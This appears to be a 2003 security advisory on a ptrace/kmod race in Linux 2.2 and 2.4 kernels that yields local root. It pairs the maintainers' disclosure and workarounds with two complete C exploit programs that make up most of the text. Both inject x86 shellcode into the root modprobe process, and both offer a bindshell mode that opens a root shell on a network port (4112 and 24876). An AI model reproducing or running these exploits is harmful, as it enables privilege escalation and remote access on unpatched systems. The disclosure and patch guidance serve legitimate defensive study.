17th Mar 2003 [SBWID-6072]
COMMAND
Linux local root exploit via ptrace
SYSTEMS AFFECTED
Linux 2.2, 2.4
PROBLEM
Alan Cox [[email protected]] says :
http://www.uwsg.iu.edu/hypermail/linux/kernel/0303.2/0226.html
The Linux 2.2 and Linux 2.4 kernels have a flaw in ptrace. This hole
allows local users to obtain full privileges. Remote exploitation of
this hole is not possible. Linux 2.5 is not believed to be vulnerable.
Linux 2.2.25 has been released to correct Linux 2.2. It contains no
other changes. The bug fixes that would have been in 2.2.5pre1 will now
appear in 2.2.26pre1. The patch will apply directly to most older 2.2
releases.
A patch for Linux 2.4.20/Linux 2.4.21pre is attached. The patch also
subtly changes the PR_SET_DUMPABLE prctl. We believe this is neccessary
and that it will not affect any software. The functionality change is
specific to unusual debugging situations.
We would like to thank Andrzej Szombierski who found the problem, and
wrote an initial patch. Seth Arnold cleaned up the 2.2 change. Arjan
van de Ven and Ben LaHaise identified additional problems with the
original fix.
Update (20 March 2003)
======
Andrzej Szombierski [[email protected]] [http://bezkitu.com]
comments :
There are many discussions (on slashdot for example) on the recent
linux ptrace (& kmod) bug. I'll try to clarify what is this all
about.
It's a local root vulnerability. It's exploitable only if:
1. the kernel is built with modules and kernel module loader enabled
and
2. /proc/sys/kernel/modprobe contains the path to some valid executable
and
3. ptrace() calls are not blocked
These conditions are met on most standard linux distros.
Ok now how it works:
When a process requests a feature which is in a module, the kernel
spawns a child process, sets its euid and egid to 0 and calls
execve("/sbin/modprobe") The problem is that before the euid change the
child process can be attached to with ptrace(). Game over, the user can
insert any code into a process which will be run with the superuser
privileges.
A word about 2.5. kernels - these are not vulnerable because the kernel
thread spawning code has been rewritten so that the modprobe process is
spawned from keventd, it never runs with non-root uid, so it can't be
ptraced by any non-root user.
Sample exploit here (ix86-only):
http://august.v-lo.krakow.pl/~anszom/km3.c
/* lame, oversophisticated local root exploit for kmod/ptrace bug in linux
* 2.2 and 2.4
*
* have fun
*/
#define ANY_SUID "/usr/bin/passwd"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <linux/user.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <asm/ioctls.h>
#include <getopt.h>
// user settings:
int randpids=0;
#define M_SIMPLE 0
#define M_DOUBLE 1
#define M_BIND 2
int mode=M_SIMPLE;
char * bin=NULL;
struct stat me;
int chldpid;
int hackpid;
// flags
int sf=0;
int u2=0;
void killed(int a) { u2=1; }
void synch(int x){ sf=1; }
// shellcode to inject
unsigned char shcode[1024];
char ptrace_code[]="\x31\xc0\xb0\x1a\x31\xdb\xb3\x10\x89\xf9"
"\xcd\x80\x85\xc0\x75\x41\xb0\x72\x89\xfb\x31\xc9\x31\xd2\x31\xf6"
"\xcd\x80\x31\xc0\xb0\x1a\x31\xdb\xb3\x03\x89\xf9\xb2\x30\x89\xe6"
"\xcd\x80\x8b\x14\x24\xeb\x36\x5d\x31\xc0\xb0\xFF\x89\xc7\x83\xc5"
"\xfc\x8b\x75\x04\x31\xc0\xb0\x1a\xb3\x04\xcd\x80\x4f\x83\xed\xfc"
"\x83\xea\xfc\x85\xff\x75\xea\x31\xc0\xb0\x1a\x31\xdb\xb3\x11\x31"
"\xd2\x31\xf6\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xc5\xff"
"\xff\xff";
char execve_tty_code[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x68"
"\x2f\x74\x74\x79\x68\x2f\x64\x65\x76\x89\xe3\xb0\x05\x31\xc9\x66"
"\xb9\x41\x04\x31\xd2\x66\xba\xa4\x01\xcd\x80\x89\xc3\x31\xc0\xb0"
"\x3f\x31\xc9\xb1\x01\xcd\x80\x31\xc0\x50\xeb\x13\x89\xe1\x8d\x54"
"\x24\x04\x5b\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8"
"\xe8\xff\xff\xff";
char execve_code[]="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\xb0\x46"
"\x31\xc0\x50\xeb\x13\x89\xe1\x8d\x54\x24\x04\x5b\xb0\x0b\xcd\x80"
"\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe8\xff\xff\xff";
char bind_code[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x40"
"\x50\x40\x50\x8d\x58\xff\x89\xe1\xb0\x66\xcd\x80\x83\xec\xf4\x89"
"\xc7\x31\xc0\xb0\x04\x50\x89\xe0\x83\xc0\xf4\x50\x31\xc0\xb0\x02"
"\x50\x48\x50\x57\x31\xdb\xb3\x0e\x89\xe1\xb0\x66\xcd\x80\x83\xec"
"\xec\x31\xc0\x50\x66\xb8\x10\x10\xc1\xe0\x10\xb0\x02\x50\x89\xe6"
"\x31\xc0\xb0\x10\x50\x56\x57\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x83"
"\xec\xec\x85\xc0\x75\x59\xb0\x01\x50\x57\x89\xe1\xb0\x66\xb3\x04"
"\xcd\x80\x83\xec\xf8\x31\xc0\x50\x50\x57\x89\xe1\xb0\x66\xb3\x05"
"\xcd\x80\x89\xc3\x83\xec\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74"
"\x08\x31\xc0\xb0\x06\xcd\x80\xeb\xdc\x31\xc0\xb0\x3f\x31\xc9\xcd"
"\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31"
"\xc0\x50\xeb\x13\x89\xe1\x8d\x54\x24\x04\x5b\xb0\x0b\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe8\xff\xff\xff";
// generate shellcode that sets %edi to pid
int pidcode(unsigned char * tgt, unsigned short pid)
{
fprintf(stderr, "pid=%d=0x%08x\n", pid, pid);
tgt[0]=0x31; tgt[1]=0xff;
tgt+=2;
if((pid & 0xff) && (pid & 0xff00)){
tgt[0]=0x66; tgt[1]=0xbf;
*((unsigned short*)(tgt+2))=pid;
return 6;
}else{
int n=2;
if(pid & 0xff00){
tgt[0]=0xB0; tgt[1]=(pid>>8);
tgt+=2; n+=2;
}
memcpy(tgt,"\xC1\xE0\x08", 3); tgt+=3; n+=3;
if(pid & 0xff){
tgt[0]=0xB0; tgt[1]=pid;
tgt+=2; n+=2;
}
tgt[0]=0x89; tgt[1]=0xC7;
return n+2;
}
}
void mkcode(unsigned short pid)
{
int i=0;
unsigned char *c=shcode;
c+=pidcode(c, pid);
strcpy(c, ptrace_code);
c[53]=(sizeof(execve_code)+strlen(bin)+4)/4;
strcat(c, execve_code);
strcat(c, bin);
}
//------------------------
void hack(int pid)
{
int i;
struct user_regs_struct r;
char b1[100]; struct stat st;
int len=strlen(shcode);
if(kill(pid, 0)) return;
sprintf(b1, "/proc/%d/exe", pid);
if(stat(b1, &st)) return;
if(st.st_ino!=me.st_ino || st.st_dev!=me.st_dev) return;
if(ptrace(PTRACE_ATTACH, pid, 0, 0)) return;
while(ptrace(PTRACE_GETREGS, pid, NULL, &r));
fprintf(stderr, "\033[1;33m+ %d\033[0m\n", pid);
if(ptrace(PTRACE_SYSCALL, pid, 0, 0)) goto fail;
while(ptrace(PTRACE_GETREGS, pid, NULL, &r));
for (i=0; i<=len; i+=4)
if(ptrace(PTRACE_POKETEXT, pid, r.eip+i, *(int*)(shcode+i))) goto fail;
kill(chldpid, 9);
ptrace(PTRACE_DETACH, pid, 0, 0);
fprintf(stderr, "\033[1;32m- %d ok!\033[0m\n", pid);
if(mode==M_DOUBLE){
char commands[1024];
char * c=commands;
kill(hackpid, SIGCONT);
sprintf(commands, "\nexport TERM='%s'\nreset\nid\n", getenv("TERM"));
while(*c) { ioctl(0, TIOCSTI, c++); }
waitpid(hackpid, 0, 0);
}
exit(0);
fail:
ptrace(PTRACE_DETACH, pid, 0, 0);
kill(pid, SIGCONT);
}
void usage(char * cmd)
{
fprintf(stderr, "Usage: %s [-d] [-b] [-r] [-s] [-c executable]\n"
"\t-d\t-- use double-ptrace method (to run interactive programs)\n"
"\t-b\t-- start bindshell on port 4112\n"
"\t-r\t-- support randomized pids\n"
"\t-c\t-- choose executable to start\n"
"\t-s\t-- single-shot mode - abort if unsuccessful at the first try\n", cmd);
exit(0);
}
int main(int ac, char ** av, char ** env)
{
int single=0;
char c;
int mypid=getpid();
fprintf(stderr, "Linux kmod + ptrace local root exploit by <[email protected]>\n\n");
if(stat("/proc/self/exe", &me) && stat(av[0], &me)){
perror("stat(myself)");
return 0;
}
while((c=getopt(ac, av, "sbdrc:"))!=EOF) switch(c) {
case 'd': mode=M_DOUBLE; break;
case 'b': mode=M_BIND; break;
case 'r': randpids=1; break;
case 'c': bin=optarg; break;
case 's': single=1; break;
default: usage(av[0]);
}
if(ac!=optind) usage(av[0]);
if(!bin){
if(mode!=M_SIMPLE) bin="/bin/sh";
else{
struct stat qpa;
if(stat((bin="/bin/id"), &qpa)) bin="/usr/bin/id";
}
}
signal(SIGUSR1, synch);
hackpid=0;
switch(mode){
case M_SIMPLE:
fprintf(stderr, "=> Simple mode, executing %s > /dev/tty\n", bin);
strcpy(shcode, execve_tty_code);
strcat(shcode, bin);
break;
case M_DOUBLE:
fprintf(stderr, "=> Double-ptrace mode, executing %s, suid-helper %s\n",
bin, ANY_SUID);
if((hackpid=fork())==0){
char *ble[]={ANY_SUID, NULL};
fprintf(stderr, "Starting suid program %s\n", ANY_SUID);
kill(getppid(), SIGUSR1);
execve(ble[0], ble, env);
kill(getppid(), 9);
perror("execve(SUID)");
_exit(0);
}
while(!sf);
usleep(100000);
kill(hackpid, SIGSTOP);
mkcode(hackpid);
break;
case M_BIND:
fprintf(stderr, "=> portbind mode, executing %s on port 4112\n", bin);
strcpy(shcode, bind_code);
strcat(shcode, bin);
break;
}
fprintf(stderr, "sizeof(shellcode)=%d\n", strlen(shcode));
signal(SIGUSR2, killed);
if(randpids){
fprintf(stderr, "\033[1;31m"
"Randomized pids support enabled... be patient or load the system heavily,\n"
"this method does more brute-forcing\033[0m\n");
}
again:
sf=0;
if((chldpid=fork())==0){
int q;
kill(getppid(), SIGUSR1);
while(!sf);
fprintf(stderr, "=> Child process started");
for(q=0;q<10;++q){
fprintf(stderr, ".");
socket(22,0,0);
}
fprintf(stderr, "\n");
kill(getppid(), SIGUSR2);
_exit(0);
}
while(!sf);
kill(chldpid, SIGUSR1);
for(;;){
int q;
if(randpids){
for(q=1;q<30000;++q)
if(q!=chldpid && q!=mypid && q!=hackpid) hack(q);
}else{
for(q=chldpid+1;q<chldpid+10;q++) hack(q);
}
if(u2){
u2=0;
if(single) break;
goto again;
}
}
fprintf(stderr, "Failed\n");
return 1;
}
// M$ sucks
//
// http://bezkitu.com/
Update 14 april: other exploit
==============================
/*
* Author: snooq [http://www.angelfire.com/linux/snooq/]
* Date: 10 April 2003
*
* Wojciech Purczynski [ [email protected] ], says (in his code):
*
* [quote]
* This code exploits a race condition in kernel/kmod.c, which creates
* kernel thread in insecure manner. This bug allows to ptrace cloned
* process, allowing to take control over privileged modprobe binary.
* [/quote]
*
* For more info: http://www.securiteam.com/unixfocus/5FP0A2K9GQ.html
*
* Temp fix --> echo XXX > /proc/sys/kernel/modprobe
*
* I've seen somewhere... somebody suggested 'chmod 700 /proc' as a quick
* fix....
*
* The truth is... 'chmod 700 /proc' does not close the hole.
* It merely cripple the exploit... which reads /proc entries
*
* The flaw is still exploitable without 'rwx' to /proc..
*
* Having said all these craps.... I must say that I'm still a newbie to
* kernel stuffs.... and I think my code looks really ugly too....
*
* so... if you r not happy wif the way I code.. or any suggestions for me..
* or even flames.... direct them to jinyean_at_hotmail_dot_com
*
* Well.. I dun usually do this.. but I will do it this time...
* Greetz.. my team mates??? Nam, JF & ET?? haha...
*
* just wanna thank u for reading these craps..
* and to ET.. maybe next time.. I could join u as a kernel hacker... =p
*
* Notes:
* ======
* 1. There are at least 2 versions of exploit out there..
* ie, Wojciech's and anszom's...
*
* 2. The way I exploit it is no diff from both except:
* -> mine is one attempt per run. Script it, if u need to
* -> bind port instead of spawn shell..
* -> dun bother to read /proc entries
* -> not as feature rich as anszom's
* -> not as reliable.... etc... etc..
*
* 3. I coded this as an exercise.. as a way to learn bout kernel internals
*
* 4. Lastly, credits go to Wojciech and anszom.
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <linux/user.h> /* For user_regs_struct */
#define SIZE (sizeof(shellcode)-1)
pid_t parent=0;
pid_t child=0;
pid_t k_child=0;
static int sigc=0;
/*
Port binding shellcode, courtesy of <[email protected]>
I just changed the port no..... =p
*/
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x40"
"\x50\x40\x50\x8d\x58\xff\x89\xe1\xb0\x66\xcd\x80\x83\xec\xf4\x89"
"\xc7\x31\xc0\xb0\x04\x50\x89\xe0\x83\xc0\xf4\x50\x31\xc0\xb0\x02"
"\x50\x48\x50\x57\x31\xdb\xb3\x0e\x89\xe1\xb0\x66\xcd\x80\x83\xec"
"\xec\x31\xc0\x50\x66\xb8\x61\x2c\xc1\xe0\x10\xb0\x02\x50\x89\xe6"
"\x31\xc0\xb0\x10\x50\x56\x57\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x83"
"\xec\xec\x85\xc0\x75\x59\xb0\x01\x50\x57\x89\xe1\xb0\x66\xb3\x04"
"\xcd\x80\x83\xec\xf8\x31\xc0\x50\x50\x57\x89\xe1\xb0\x66\xb3\x05"
"\xcd\x80\x89\xc3\x83\xec\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74"
"\x08\x31\xc0\xb0\x06\xcd\x80\xeb\xdc\x31\xc0\xb0\x3f\x31\xc9\xcd"
"\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31"
"\xc0\x50\xeb\x13\x89\xe1\x8d\x54\x24\x04\x5b\xb0\x0b\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe8\xff\xff\xff/bin/sh";
void sigchld() {
sigc++;
return;
}
void sigalrm() {
fprintf(stderr,"-> Something wrong and it timeout.\n");
exit(0);
}
main(int argc, char *argv[]) {
int i, error;
pid_t pid;
struct user_regs_struct regs; /* Registers Structure */
parent=getpid();
switch (pid=fork()) {
case -1:
perror("Can't fork(): ");
break;
case 0: /* Child's thread -- The attacking thread. */
child=getpid();
k_child=child+1; /* Kernel child's PID... Hopefully.. */
fprintf(stderr, "-> Parent's PID is %d. Child's PID is %d.\n", parent, child);
fprintf(stderr, "-> Attaching to %d...", k_child);
/*
Trying to attach to the child spawned by the kernel, which has both
euid and egid set to 0. Child will be sent a SIGSTOP and we, the 'parent',
will get a SIGCHLD. This process is not immediate. Hence, we need to
wait before we continue. Otherwise, we will fail controlling the thread.
*/
signal(SIGCHLD,sigchld);
signal(SIGALRM,sigalrm);
alarm(10);
while ((error=ptrace(PTRACE_ATTACH,k_child,0,0)==-1) && (errno==ESRCH)) {
fprintf(stderr, ".");
}
if (error==-1) {
fprintf(stderr,"-> Unable to attach to %d.\n",k_child);
exit(0);
}
fprintf(stderr, "\n-> Got the thread!!\n");
/*
Waiting for the firt SIGCHLD, which signals the end of the attaching action.
*/
while(sigc<1);
if (ptrace(PTRACE_SYSCALL,k_child,0,0)==-1) {
fprintf(stderr,"-> Unable to setup syscall trace.\n");
exit(0);
}
/*
The thread is under our control now. Will wail for the next signal
to inject our own code.
*/
fprintf(stderr,"-> Waiting for the next signal...\n");
while(sigc<2);
if (ptrace(PTRACE_GETREGS,k_child,NULL,®s)==-1) {
perror("-> Unable to read registers: ");
}
fprintf(stderr, "-> Injecting shellcode at 0x%08x\n",regs.eip);
for (i=0; i<=SIZE; i+=4) {
if( ptrace(PTRACE_POKETEXT,k_child,regs.eip+i,*(int*)(shellcode+i))) {}
}
fprintf(stderr, "-> Bind root shell on port 24876... =p\n");
/*
All done. It's time to leave 'our' poor child alone.... ;)
and get ready to kill ourselves...
*/
if (ptrace(PTRACE_DETACH,k_child,0,0)==-1) {
perror("-> Unable to detach from modprobe thread: ");
}
fprintf(stderr, "-> Detached from modprobe thread.\n");
fprintf(stderr, "-> Committing suicide.....\n");
if (kill(parent,9)==-1) { /* This is really ugly..... */
perror("-> We survived??!!?? ");
}
/*
We should be dead by now.
*/
exit(0);
break;
default: /* Parent's thread -- The vulnerable call */
/*
Now, the parent is requesting a feature in a kernel module.
Such action will trigger the kernel to spawn a child with
euid=0, egid=0.... Voila!!!
NB: See <linux/socket.h> for more info.
*/
signal(SIGALRM,sigalrm);
alarm(10);
socket(AF_SECURITY,SOCK_STREAM,1);
break;
}
exit(0);
}
SOLUTION
Patch is available, see link above.
Solutions/workarounds:
- patch the kernel
or
- disable kmod/modules
or
- install a ptrace-blocking module
or
- set /proc/sys/kernel/modprobe to /any/bogus/file